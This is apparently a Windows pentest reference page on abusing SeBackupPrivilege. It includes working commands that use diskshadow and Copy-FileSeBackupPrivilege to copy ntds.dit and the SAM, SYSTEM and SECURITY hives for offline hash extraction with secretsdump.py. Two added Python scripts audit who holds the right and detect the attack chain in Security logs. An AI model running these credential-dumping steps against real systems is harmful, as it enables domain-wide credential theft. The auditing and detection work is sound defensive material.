SeBackupPrivilege
SeBackupPrivilege is a Windows user right that lets its holders (by default the members of the Backup Operators group) bypass file security in order to back up files and directories: any file can be opened for reading with backup semantics regardless of its ACL. The right is essential for making backups, but it is also a significant security risk when misused, since it grants read access to every file on the system, including credential stores. It is typically assigned only to system administrators or backup operators.
The PowerShell module from the GitHub project referenced below provides cmdlets for working with this right: once its DLLs are imported, Set-SeBackupPrivilege enables SeBackupPrivilege in the current token if it is disabled, and Get-SeBackupPrivilege reports whether it is currently enabled.
Once the privilege is enabled, a file that would otherwise return Access Denied can be copied with Copy-FileSeBackupPrivilege and then read from the copy:
Copy-FileSeBackupPrivilege 'C:\Secret\Hidden.txt' .\Hidden.txt ## Copy the protected file
cat .\Hidden.txt ## Read the copy
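From the defender's side, the first question is who actually holds this right on a given host. The following script is an added example (it is not part of the original page or of the SeBackupPrivilege project): it parses the [Privilege Rights] section of a secedit export (secedit /export /cfg <file>) and reports every holder of SeBackupPrivilege or SeRestorePrivilege that is not one of the built-in groups expected to have it. The INF text embedded below is constructed sample data; the set of expected SIDs is an assumption to be tuned per environment.

```python
"""Audit SeBackupPrivilege / SeRestorePrivilege holders from a secedit export.

Added example, not from the original page or the SeBackupPrivilege project.
On the host run:  secedit /export /cfg C:\\Windows\\Temp\\rights.inf
then:             python audit_backup_rights.py C:\\Windows\\Temp\\rights.inf
Without an argument the constructed SAMPLE_INF below is audited instead.
"""
import sys
from typing import Dict, List

# Rights that bypass file ACLs: backup = read anything, restore = write anything.
WATCHED = ("SeBackupPrivilege", "SeRestorePrivilege")

# Assumed baseline: built-in groups that hold these rights by default.
EXPECTED_SIDS = {
    "S-1-5-32-544",  # Administrators
    "S-1-5-32-551",  # Backup Operators
    "S-1-5-32-549",  # Server Operators (domain controllers)
}

# Constructed sample of what secedit writes; the last SID on the
# SeBackupPrivilege line stands in for a domain account that should not be there.
SAMPLE_INF = """[Unicode]
Unicode=yes
[Privilege Rights]
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-21-1111-2222-3333-1105
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551
SeShutdownPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(inf_text: str) -> Dict[str, List[str]]:
    """Return {privilege: [holder, ...]} from the [Privilege Rights] section."""
    rights: Dict[str, List[str]] = {}
    in_section = False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            # Section header: only the privilege-rights section is of interest.
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # secedit prefixes SIDs with '*'; resolved names may also appear.
        holders = [h.strip().lstrip("*") for h in value.split(",") if h.strip()]
        rights[name.strip()] = holders
    return rights


def audit_rights(inf_text: str) -> Dict[str, List[str]]:
    """Return {privilege: [unexpected holders]} for the watched privileges."""
    rights = parse_privilege_rights(inf_text)
    findings: Dict[str, List[str]] = {}
    for priv in WATCHED:
        extra = [sid for sid in rights.get(priv, []) if sid not in EXPECTED_SIDS]
        if extra:
            findings[priv] = extra
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # secedit writes its export as UTF-16 with a BOM.
        with open(sys.argv[1], encoding="utf-16") as fh:
            text = fh.read()
    else:
        text = SAMPLE_INF
    result = audit_rights(text)
    if not result:
        print("no unexpected holders of backup/restore rights")
    for priv, holders in result.items():
        print(f"{priv}: unexpected holder(s): {', '.join(holders)}")
```

Unexpected holders are reported by SID; resolving them to names (for example with Get-LocalGroupMember or an LDAP lookup) and checking whether the account is also a member of Backup Operators is the natural follow-up, since group membership grants the right just as directly as an explicit assignment.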
Targeting NTDS.dit
diskshadow.exe
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
dir E: ## Now check E Drive
# Copy ntds.dit from new mapped drive using https://github.com/giuliano108/SeBackupPrivilege
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Users\USERNAME\Desktop\ntds.dit
# Transfer ntds.dit (together with the SYSTEM hive) to the attack host and run secretsdump.py offline
python3 /path/to/secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
# Or use https://www.dsinternals.com/en/dumping-ntds-dit-files-using-powershell/
SAM, SYSTEM and SECURITY registry hives
Copy-FileSeBackupPrivilege 'E:\windows\system32\config\SAM' ./SAM
Copy-FileSeBackupPrivilege 'E:\windows\system32\config\SYSTEM' ./SYSTEM
Copy-FileSeBackupPrivilege 'E:\windows\system32\config\SECURITY' ./SECURITY
We can now transfer the files to our attack machine using any technique we're familiar with and use secretsdump.py.
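The sequence above (enable the privilege in a PowerShell token, create and expose a shadow copy, then read ntds.dit or the SAM/SYSTEM/SECURITY hives through the new drive letter) leaves a recognisable trail in the Security log. The script below is an added example, not code from the original page or from any vendor: it runs simple detection logic over Windows Security events exported as JSON lines and correlates the three stages per user. It assumes the exported records use the Security log's own field names (EventID 4703 with ProcessName and EnabledPrivilegeList, 4688 with NewProcessName, 4663 with ProcessName and ObjectName); the five records embedded below are constructed, and the BACKUP_AGENTS allow-list is an assumption to be tuned to the real backup software in use.

```python
"""Detect the enable-privilege / shadow-copy / credential-store-read chain.

Added example, not from the original page or any vendor product. Input is one
JSON object per line with Windows Security log field names; SAMPLE_EVENTS below
are constructed. Usage:  python detect_backup_abuse.py < security_events.jsonl
"""
import json
import re
import sys
from typing import Dict, Iterable, List, Optional, Set

# Tools that create or expose Volume Shadow Copies or dump AD from disk.
SNAPSHOT_TOOLS = {"diskshadow.exe", "vssadmin.exe", "ntdsutil.exe", "wbadmin.exe"}

# Credential stores: the AD database and the SAM/SYSTEM/SECURITY hives.
SENSITIVE_FILES = re.compile(
    r"\\(ntds\.dit|system32\\config\\(sam|system|security))$", re.IGNORECASE
)

# Assumed allow-list of processes that legitimately hold backup rights.
BACKUP_AGENTS = {"wbengine.exe", "vssvc.exe", "lsass.exe", "system"}

LABEL_PRIV = "backup-privilege-enabled-by-non-backup-process"
LABEL_TOOL = "shadow-copy-tool-started"
LABEL_READ = "credential-store-read-by-unexpected-process"
FULL_CHAIN = {LABEL_PRIV, LABEL_TOOL, LABEL_READ}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample records (not real log data).
SAMPLE_EVENTS = [
    # 1: SeBackupPrivilege enabled inside a PowerShell token (4703: token right adjusted).
    {"EventID": 4703, "SubjectUserName": "svc_backup", "ProcessName": PS,
     "EnabledPrivilegeList": "SeBackupPrivilege"},
    # 2: diskshadow started by the same user (4688: process creation).
    {"EventID": 4688, "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\diskshadow.exe", "CommandLine": "diskshadow.exe"},
    # 3: ntds.dit read through the exposed shadow-copy drive (4663: object access).
    {"EventID": 4663, "SubjectUserName": "svc_backup", "ProcessName": PS,
     "ObjectName": r"E:\Windows\NTDS\ntds.dit", "AccessMask": "0x1"},
    # 4: benign: the Windows Server Backup engine reading a hive during a scheduled job.
    {"EventID": 4663, "SubjectUserName": "SYSTEM",
     "ProcessName": r"C:\Windows\System32\wbengine.exe",
     "ObjectName": r"C:\Windows\System32\config\SAM", "AccessMask": "0x1"},
    # 5: unrelated process creation.
    {"EventID": 4688, "SubjectUserName": "alice",
     "NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict) -> Optional[str]:
    """Return a finding label for one event, or None if it looks benign."""
    eid = event.get("EventID")
    if eid == 4703 and "SeBackupPrivilege" in event.get("EnabledPrivilegeList", ""):
        if basename(event.get("ProcessName", "")) not in BACKUP_AGENTS:
            return LABEL_PRIV
    if eid == 4688 and basename(event.get("NewProcessName", "")) in SNAPSHOT_TOOLS:
        return LABEL_TOOL
    if eid == 4663 and SENSITIVE_FILES.search(event.get("ObjectName", "")):
        if basename(event.get("ProcessName", "")) not in BACKUP_AGENTS:
            return LABEL_READ
    return None


def scan(events: Iterable[Dict]) -> List[Dict]:
    """Classify every event and keep the ones that produced a finding."""
    findings = []
    for ev in events:
        label = classify(ev)
        if label:
            findings.append({"user": ev.get("SubjectUserName"),
                             "event_id": ev.get("EventID"), "finding": label})
    return findings


def users_with_full_chain(findings: List[Dict]) -> Set[str]:
    """Users seen enabling the right, starting a snapshot tool and reading a store."""
    stages: Dict[str, Set[str]] = {}
    for f in findings:
        stages.setdefault(f["user"], set()).add(f["finding"])
    return {user for user, seen in stages.items() if FULL_CHAIN <= seen}


if __name__ == "__main__":
    events = [json.loads(l) for l in sys.stdin if l.strip()] if not sys.stdin.isatty() else SAMPLE_EVENTS
    found = scan(events)
    for f in found:
        print(f"{f['event_id']} {f['user']}: {f['finding']}")
    for user in users_with_full_chain(found):
        print(f"ALERT: full backup-abuse chain observed for {user}")
```

Each stage on its own is noisy in a real environment (4703 in particular fires constantly for service tokens), which is why the allow-list filters by process and why the alert only fires when one account produces all three findings. Object-access auditing on the NTDS folder and on %SystemRoot%\System32\config is required for the 4663 stage to exist at all; the other two stages need process-creation auditing and the "Audit Token Right Adjusted" subcategory enabled.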
More
More about these attacks is available at: